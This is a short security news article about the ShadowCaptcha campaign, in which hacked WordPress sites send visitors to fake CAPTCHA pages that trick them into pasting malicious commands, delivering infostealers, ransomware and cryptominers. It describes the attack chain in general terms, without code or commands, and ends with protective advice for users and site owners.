ShadowCaptcha is a newly discovered cyber campaign that has been spreading quietly through compromised WordPress websites. Researchers found that hackers have been injecting malicious code into real websites and redirecting visitors to fake CAPTCHA verification pages. These pages look almost identical to popular services like Google or Cloudflare, which makes them convincing enough to trick people. The campaign came to light in August 2025 and is already affecting users around the world.

When someone visits one of these hacked websites, they are suddenly redirected to a fake CAPTCHA page. On the surface, it seems like a normal verification step asking the user to prove they are not a robot. In reality, this page is the entry point for the attack. Visitors are told to complete simple actions that appear safe, but behind the scenes the instructions set up the malware installation process.

The main trick used in this attack is called ClickFix. Instead of forcing a file download, the fake CAPTCHA convinces users to copy and paste a short command from their clipboard into tools like PowerShell or the Windows Run dialog. Many people do this without realizing the risk, believing they are just following a verification step. That single command is enough to give the attackers a foothold on the victim’s system.

Once the command is executed, the attackers can deliver a wide variety of harmful software. Some victims end up with information stealers that collect passwords, cookies, and sensitive files. Others unknowingly install ransomware that locks their computers and demands payment to restore access. In many cases, cryptocurrency mining software is deployed, using up the victim’s computer power to secretly generate money for the attackers.

The malware is delivered in different ways depending on the path the user takes. Some attacks guide victims to run installer files that deliver infostealers like Lumma or Rhadamanthys. Others push victims to download and run an HTML Application file, which then launches ransomware such as Epsilon Red. Security experts have even seen cryptominers dropped with the help of vulnerable drivers that give the malware deeper access to the system.

The campaign has already been spotted on more than a hundred WordPress sites across different countries. Infections have been reported in places such as Israel, Brazil, Canada, Australia, and Italy, and the targeted industries include healthcare, finance, real estate, and hospitality. Because WordPress is so widely used, this attack has the potential to reach a very large audience without most website owners even realizing their sites are being abused.

What makes ShadowCaptcha especially dangerous is its layered strategy. It combines social engineering, obfuscated scripts, and the use of legitimate system tools to bypass traditional security defenses. By getting victims to run the malicious command themselves, the attackers avoid the red flags that normally alert antivirus programs. This approach has made the campaign harder to detect and more effective in spreading different kinds of malware.

Investigators have published detailed reports on how the attack chain works. The injected JavaScript on the hacked websites triggers the redirect, the fake CAPTCHA page carries out the ClickFix trick, and the payload is delivered in stages. Each step is designed to look harmless, which is why many people fall for it. Even experienced users can be fooled because the process mimics familiar online interactions.

For everyday users, the advice is simple: never copy and paste commands from a website into your system. If you see a CAPTCHA or verification step that asks you to run code, close the page immediately. It is also important to keep devices updated, run regular security scans, and use strong security software. Website owners should patch WordPress and plugins quickly, check their code for tampering, and monitor their logs for unusual activity.

ShadowCaptcha is a strong reminder that attackers do not always need complex exploits to succeed. By abusing something as ordinary as a CAPTCHA, they have managed to launch a worldwide campaign that delivers ransomware, stealers, and cryptominers. This shows that awareness and caution remain some of the best defenses. Even a simple action like refusing to paste a command can make the difference between staying safe and falling victim to a costly cyberattack.

Stay alert, and keep your security measures updated!

Source: Follow cybersecurity88 on X and LinkedIn for the latest cybersecurity news